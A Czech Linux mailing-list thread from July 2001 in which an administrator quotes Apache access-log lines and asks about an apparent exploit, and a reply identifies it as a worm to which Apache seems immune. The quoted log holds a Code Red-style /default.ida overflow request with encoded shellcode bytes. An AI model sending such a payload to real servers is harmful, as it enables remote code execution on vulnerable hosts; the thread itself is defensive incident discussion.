pokus o prunik
Radek Svoboda
svoboda na neovision.cz
Pátek Červenec 20 11:57:01 CEST 2001
Miroslav Geisselreiter wrote:
> logy apache: access.log:
>
> 64.156.242.30 - - [19/Jul/2001:18:36:24 +0200] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 333
> 216.55.161.166 - - [19/Jul/2001:19:16:53 +0200] "GET
>
> Znáte někdo tento exploit, poradíte, co proti němu mohu dělat? Děkuji za
> rady a tipy.
>
Na nas web server to vcera v noci taky nekdo zkusil. Cca 20 requestu,
kazdou ctvrthodinu cca jeden, pokazde jine source IP. Vecer spis z USA,
k ranu z Koree apod. Vypada to, ze je to cerv. Apache vypada, ze je
imunni.
Radek Svoboda
Neovision s.r.o., Prague
svoboda na neovision.cz
http://www.neovision.cz
Další informace o konferenci Linux